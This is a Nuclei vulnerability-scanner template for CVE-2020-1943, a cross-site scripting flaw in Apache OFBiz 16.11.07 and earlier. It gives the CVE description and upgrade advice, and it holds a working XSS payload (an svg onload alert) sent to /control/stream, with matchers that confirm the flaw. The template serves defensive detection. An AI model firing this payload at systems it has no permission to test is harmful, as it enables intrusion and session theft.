nuclei-templates/http/cves/2020/CVE-2020-1943.yaml

52 lines
2.0 KiB
YAML

id: CVE-2020-1943
info:
name: Apache OFBiz <=16.11.07 - Cross-Site Scripting
author: pdteam
severity: medium
description: Apache OFBiz 16.11.01 to 16.11.07 is vulnerable to cross-site scripting because data sent with contentId to /control/stream is not sanitized.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade Apache OFBiz to a version higher than 16.11.07 to mitigate this vulnerability.
reference:
- https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E
- https://s.apache.org/pr5u8
- https://lists.apache.org/thread.html/r034123f2767830169fd04c922afb22d2389de6e2faf3a083207202bc@%3Ccommits.ofbiz.apache.org%3E
- https://lists.apache.org/thread.html/r8efd5b62604d849ae2f93b2eb9ce0ce0356a4cf5812deed14030a757@%3Cdev.ofbiz.apache.org%3E
- https://nvd.nist.gov/vuln/detail/CVE-2020-1943
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-1943
cwe-id: CWE-79
epss-score: 0.43119
epss-percentile: 0.97011
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: ofbiz
tags: cve2020,cve,apache,xss,ofbiz
http:
- method: GET
path:
- '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg/onload=alert(/xss/)>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a0047304502203b8ab1688db12e6e7e1cb828dec9e87c2267a66ca133ebec1502dff4da7e8bff022100a6388588d9168b562cc0b9a1d8c46f91648be930a8f4a0eadcde893ae11fc50f:922c64590222798bb761d5b6d8e72950